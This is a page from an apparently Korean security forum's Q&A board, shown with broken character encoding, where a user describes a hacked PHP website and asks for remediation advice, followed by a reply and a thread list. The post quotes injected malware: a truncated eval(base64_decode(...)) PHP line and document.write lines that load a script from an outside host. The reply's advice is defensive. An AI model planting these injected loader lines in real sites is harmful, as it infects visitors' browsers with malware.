Å©·¡Å· ÇÇÇØ

 423, 1/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   basscraft
   ¹éµµ¾î °ü·Ã ¹®ÀÇ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=473 [º¹»ç]


ȸ»ç¿¡¼­ È£½ºÆÃÇÏ°í ÀÖ´Â ¼­¹ö¿¡ ÇØÅ·À» ´çÇؼ­
¼Ò½º°¡ ¾û¸ÁÀÌ µÇ¾ú½À´Ï´Ù.

°ÅÀÇ 10³â ÀüÂë php·Î °³¹ßµÈ »çÀÌÆ®ÀÔ´Ï´Ù.
OS´Â ¸®´ª½º ÀÔ´Ï´Ù.

È®ÀÎÇØ º¸´Ï php ÆÄÀÏ ¸Ç óÀ½¿¡

<?php eval(base64_decode('aWYoIWZ1b... »ý·«...XSkpOw==')); ?>

ÀÌ·± ¼Ò½º°¡ ÀÎÁ§¼ÇµÇ¾î ÀÖ¾ú½À´Ï´Ù.
find ¸í·ÉÀ¸·Î 'eval(base64_decode(' ¹®ÀÚ¿­À» Æ÷ÇÔÇÑ ¼Ò½º¸¦ ã¾Æº¸¾Ò´õ´Ï
Æú´õº°·Î index.php ¶Ç´Â index*.php  µî ÆÄÀϵ鿡 ÀÎÁ§¼ÇµÇ¾î ÀÖ½À´Ï´Ù.

Ãß°¡·Î .js, .html ÆÄÀϵ鿡µµ

document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');
document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>')
;document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');

ÀÌ·± ³»¿ëµéÀÌ ÁÖÀԵǾî ÀÖ½À´Ï´Ù.
°ü¸®¸¦ Á¦´ë·Î ¸øÇÏ°í À־ ¼Ò½ºµµ ¹é¾÷ÀÌ ¾ÈµÈ »óÅ -0-;;;;
³ë°¡´Ù¶óµµ ÀÏÀÏÈ÷ ã¾Æ¼­ Áö¿ì¸é µÇ°ÚÁö¸¸

¹®Á¦´Â ÀÎÁ§¼ÇµÈ ¼Ò½ºÁß ÀϺδ Áß°£ºÎºÐ ÀÌÈÄ ¼Ò½º°¡ ¹¶ÅÖ Àß·Á¹ö¸° °ÍµéÀÌ Á¸ÀçÇؼ­
º¹±¸°¡ ºÒ°¡´ÉÇÑ »óÅÂÀÔ´Ï´Ù.(¿À·¡µÈ ¼Ò½º¸¦ ã¾Æ¼­ º¹±¸ÇÏ°í ÀÖ´ÂÁß...)
º¹±¸¸¦ ´Ù ÇÑ´Ù°í Çصµ ¹éµµ¾î °°Àº°Ô Á¸ÀçÇؼ­ ¶Ç´Ù½Ã µé¾î¿Ã °Í °°¾Æ¼­

¾î´À»çÀÌÆ®¿¡¼­ º» È®ÀÎ ¹æ¹ýÀ¸·Î È®ÀÎÇØ º¸´Ï

[aaa@xxx dev]$ find /dev -type f -exec ls -l {} \;
-rw-r--r--  1 root root 196608  2¿ù 27 04:47 /dev/.udev.tdb

ÀÌ·± °á°ú°¡ ÀÖ½À´Ï´Ù.
Àú°Ô ¹éµµ¾î ¸Â´ÂÁö...

´çÀå ´Ù½Ã ¼³Ä¡ÇÏ°í ½ÍÁö¸¸
ÀÏ´Ü À̹ø ¹®Á¦¸¸ ¾î¶»°Ô ³Ñ±â°í
»çÀÌÆ® ¸®´º¾óÀ» Çϱâ·Î ÀáÁ¤ ÇÕÀÇµÈ »óÅÂÀÔ´Ï´Ù.

Á¶¾ðÁ» ºÎŹµå¸³´Ï´Ù.

1. ÃßÃøµÇ´Â ÇØÅ·ÀÇ ¹æ¹ý
2. ÇØÅ·ÀÇ ¸ñÀû ¿¹»óµÇ´Â ÇÇÇØ(ȸ»ç ³», ¿ÜºÎ)
3. ¼Ò½º º¹±¸½Ã À¯ÀÇÇÒ Á¡
4. ¹éµµ¾î Á¦°Å ¹× ½Ã½ºÅÛ Á¤»óÈ­¿¡ ´ëÇÑ Á¶¾ð

Áú¹®ÀÌ ³Ê¹« ¸¹½À´Ï´Ù¸¸...
°³º° Ç׸ñÀÌ¶óµµ ´äº¯ÁÖ½Ã¸é º¹¹ÞÀ¸½Ç ²®´Ï´Ù ^^

  Hit : 4888     Date : 2010/03/03 10:00



    
¸Û¸Û 1. À§ Á¤º¸¸¸À¸·Î´Â ÃßÃøÇϱâ Èûµå³ª ÁÖ·Î À¥ÇØÅ·ÀÌ ¸¹½À´Ï´Ù. ÆÄÀÏÀÌ º¯°æµÈ ½Ã°£¿¡ ÇØ´çÇÏ´Â À¥ ·Î±×¸¦ ºÐ¼®ÇØ º¸¼¼¿ä.
2. Script°¡ »ðÀÔµÈ °ÍÀ¸·Î º¸¾Æ Ãß°¡ÀûÀÎ Client Àå¾Ç ½Ãµµ°¡ ¿¹»óµË´Ï´Ù. IE ºê¶ó¿ìÁ®À§ Ãë¾àÁ¡À»
ÀÌ¿ëÇÏ¿© À¥ »çÀÌÆ®¸¦ ¹æ¹®ÇÏ´Â ´Ù¸¥ Windows »ç¿ëÀÚµéÀ» Ãß°¡ Àå¾ÇÇÏ´Â °ÍÀ» ¸»ÇÕ´Ï´Ù.
3. eval ¿Ü¿¡µµ system, exec, passthru, popen ÇÔ¼ö ¶ÇÇÑ ¹éµµ¾î·Î »ç¿ë °¡´ÉÇÏ´Ï ÇÔ²² °Ë»öÇغ¸¼¼¿ä
4. Å©·¡Å·À» ¾ß±âÇÑ Ãë¾àÁ¡À» ãÁö ¸øÇÏ¸é º¹±¸ ÈÄ¿¡µµ Àç°¨¿° µÉ °¡´É¼ºÀÌ ³ô½À´Ï´Ù.
Script¸¦ ½É´Â ÆÐÅÏÀº ¿ú(ÀÚµ¿ °ø°Ý)¿¡ ÀÇÇÑ °ø°ÝÀÏ °¡´É¼ºÀÌ Å©±â ¶§¹®ÀÔ´Ï´Ù.
iptables¸¦ ÀÌ¿ëÇÑ ¹æÈ­º® Á¤Ã¥ ¼³Á¤ ¶ÇÇÑ °ø°Ý ¹æ¾î¿¡ µµ¿òÀÌ µÉ °ÍÀÔ´Ï´Ù.
(outbounding -¾È¿¡¼­ ¹ÛÀ¸·Î ³ª°¡´Â- ÆÐŶ Â÷´Ü µî)
5. ´äº¯ ¾È ÇÏ¸é º¹ ¸ø ¹Þ´Â°Ç°¡¿ä? ^^
2010/03/09  
423   ¸®´ª½º ½Ã½ºÅÛ ÇØÅ·À» ¹è¿ì°í½ÍÀº ÄÄ°ø2°³¿ù »õ³»±âÀÔ´Ï´Ù[9]     morieye
01/10 3401
422   ¸¶ÀÌÄõ¸® ÇØÅ·     dlaudgkr
12/07 5457
421   ¿ÍÀÌÆÄÀÌ ÇØÅ·[1]     LK7C SINEAD
09/17 3895
420   DB °¡ ÇØÅ·´çÇß½À´Ï´Ù.[5]     gilm1209
11/26 4156
419   ÀÌ·± °æ¿ì ¾ÆÀ̵ðÇØÅ· ½ºÆÔÀ¸·Î °ø°ÝÇÏ¸é ¾ÈµÇ´Â °Ç°¡¿ä?[2]     writed
07/21 3599
418   °³ÀÎ pc º¸¾ÈÁ¡°Ë °ü·ÃÇؼ­[1]     braveman2
08/06 3709
417   ¾î´À Áú¹®¹æ¿¡ ¿Ã·Á¾ß µÇ´ÂÁö ¸ô¶ó¼­¿ä~ °í¼ö´Ôµé µµ¿òºÎŹµå·Á¿ä~[1]     osssy
05/18 3222
416   ÇØÅ·´çÇÑ°ÇÁö ¾Æ´Ñ°ÇÁö È®½ÇÇÏ°Ô ¾Æ´Â ¹æ¹ý ¾ø³ª¿ä?[2]     juh11
05/17 3848
415   windows2003 ¶ó¿ìÆÃ¹× ¿ø°Ý ¾×¼¼½º ÇØÅ·[1]     geneve27
04/26 5234
414   ¸ð¸£´Â ip°¡ Á¢±ÙÇؿԴµ¥ Á» ºÁÁÖ¼¼¿ä[4]     Gloverman
01/09 6068
413   ÇØÅ·ÇÑ´Ù°í ¹®ÀÚ°¡ ¿Ô´Âµ¥¿ä[9]     yakida1940
10/03 4860
412   ÇØÅ·´çÇÑ°Å°°¾Æ¿ä[3]     dmscks1
07/15 4213
411   Á¦°¡ .. ÇØÄ¿ ÇÑÅ× ´çÇߴµ¥¿ä .. Áö±Ý IP µµ µûÀÎ »óÅÂ¶ó ¸¶¿ì½º¶û Å°º¸µå°¡ ..[7]     zjafkays
07/06 5333
410   ÇØÅ·À» ´çÇÑ°Í °°¾Æ¿ä.....[5]     gkswls123
06/22 4461
409   µµ¿ÍÁÖ¼¼¿ä ¤Ð¤Ð[2]     wnm1234
05/17 3978
408   µµ¿ÍÁÖ¼¼¿ä.[2]     sdc04303
05/07 4865
407   ¿©±â¿¡ ½áµµ µÇ´ÂÁö ¸ð¸£°Ú´Âµ¥¿ä www.xindpkz.com ÀÌ°Í ¶§¹®¿¡¿ä ³»¿ëÀÖ½À´Ï´Ù.[4]     nmy89
04/10 5846
406   GmailÀ» ÇØÅ·´çÇؼ­ »ç¿ëÇÏÁö ¸øÇÏ°í ÀÖ½À´Ï´Ù.[3]     hoaxinh
02/07 5076
405   ¤Ð¤Ð¤Ð[5]     ¾¾¿¡¸£
01/30 4325
404   ¾Æ´Â ´©´Ô²²¼­ ½ºÅäÅ·(?)´çÇϽô µí Çѵ¥¿ä..[3]     dokokou
01/22 6006
1 [2][3][4][5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org